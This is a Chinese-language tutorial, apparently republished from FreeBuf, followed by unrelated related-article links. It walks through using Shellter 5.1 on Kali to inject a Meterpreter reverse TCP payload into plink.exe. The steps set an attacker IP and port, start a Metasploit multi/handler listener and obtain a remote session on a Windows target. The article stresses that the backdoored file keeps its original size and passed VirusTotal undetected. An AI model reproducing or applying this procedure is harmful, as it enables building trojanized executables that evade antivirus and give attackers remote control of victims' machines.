Kali Shellter 5.1:动态ShellCode注入工具 绕过安全软件

或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。

首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。Shellter有一个自动模式,该模式会使整个操作过程变得十分的简单。在这篇文章中,我使用Kali 2.0作为主机,另外一台Windows作为靶机。

0x01 磨刀:

Kali中不包含最新版本的Shellter,如果要获取最新版本需要下载、解压ZIP文件。

1.下载安装shellter https://www.shellterproject.com/download/

原文作者把下载下来的文件保存在了/root/Desktop 目录。

2.从Kali系统的“usr/share/windows-binaries”目录中找到“plink.exe”,然后将其拷贝至Shellter的文件夹中。

3.切换到 /root/Desktop/shellter 目录

0x02 砍柴:

4.从终端启动shellter

wine shellter.exe

5.键入“A”启用自动模式:

6.在提示PE目标时,输入:“plink.exe”

7.当询问是否启用隐身模式时输入:“Y”

在隐身模式新功能下,后门文件仍然具有原始文件的功能。

8.当提示输入Payloads时选择“L”然后选择“1” Meterpreter_Reverse_TCP

9.输入Kali主机的IP(原文作者使用192.168.1.39)

10.输入程序要使用的端口(原文作者使用4545)

Shellter将会在plink.exe中注入shellcode,这时你可能需要稍等一会儿。然后,你就可以看到:

这时你会在Shellter目录发现两个文件:‘plink.exe’(这个是被注入shellcode的后门文件)‘plink.exe.bak’(这个是原来的正常文件)

11.现在,我们需要在Kali系统中使用和之前相同的一些参数启动一个监听服务

msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.39 set lport 4545 exploit

12.把‘plink.exe’复制到Windows系统

13.如果你在Windows系统里面运行plink.exe

这里列出了一些帮助信息,但这个操作并不会触发远程shell,但是当我们用plink进行远程登录的时候(这里登陆的是树莓派)如下图所示:

请注意,我们通过plink得到树莓派ssh的登录提示,同时,在kali中Metasploit也得到了一个session:

0x03 getshell

这时可以执行sysinfo获得靶机的一些系统信息:

译者注:

值得一提的是:与注入shellcode之前的程序相比,经过处理的后门程序的大小与原程序在大小上是完全一样的!更为重要的是把后门程序传到Virustotal网站并没有报毒(这个是2015年7月12日 用shellter 4.0制作的后门上传检测结果)。

*参考:Dark Cyber 编译/0xroot ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2015-10-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏技术专栏

SpringMVC添加异步请求支持

注意web.xml应用需在所有的servlet和filter配置加上<async-supported>true</async-supported>

9121
来自专栏网络

换换Cygwin的Terminal吧

17年最后一篇技术相关帖来介绍一下使用secureCRT等工具连接cygwin吧。 cygwin可以说是一个很好的在Windows上迅速模拟和学习Unix/Li...

2247
来自专栏Netkiller

PHP 安全与性能

PHP 安全与性能 摘要 我的系列文档 Netkiller Architect 手札Netkiller Developer 手札Netkiller PHP 手札...

4996
来自专栏运维咖啡吧

LDAP落地实战(一):OpenLDAP部署及管理维护

上边来了一堆的名词解释,看的云里雾里,还不是很明白,怎么跟自己的组织架构对应起来呢?看看下边的图是不是清晰明了

4023
来自专栏技术之路

翻译qmake文档(一) qmake指南和概述

英文文档连接: http://qt-project.org/doc/qt-5/qmake-manual.html http://qt-project.org/d...

2667
来自专栏中国白客联盟

导出域内用户hash的几种方法

在渗透测试期间,可以利用域管权限对域内用户hash进行导出和破解。这些域内用户hash存储在域控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如...

1454
来自专栏云计算教程系列

如何在Debian 9上使用Apt安装Java

Java和JVM(Java的虚拟机)是许多软件所必需的,包括Tomcat,Jetty,Glassfish,Cassandra和Jenkins。

7722
来自专栏云原生架构实践

JHipster生成微服务架构的应用栈(二)- 认证微服务示例

这里选择JHipster UAA server,这是一种基于OAuth认证机制的微服务。

2724
来自专栏Fish

安装IDEA和运行SCALA程序

下载与配置IDEA 从官网下载 里面有Ultimate(最终版)和Community(社区版),对于普通的开发者来说,社区版就够了,然后因为我本来配置了JDK...

4209
来自专栏Zachary46

Android直接用手机打包apk!

本人用的是Mac,以下操作都是在Mac环境下配置的,Windows环境的配置移步到Android使用Jenkins自动化构建测试打包apk

4473

扫码关注云+社区

领取腾讯云代金券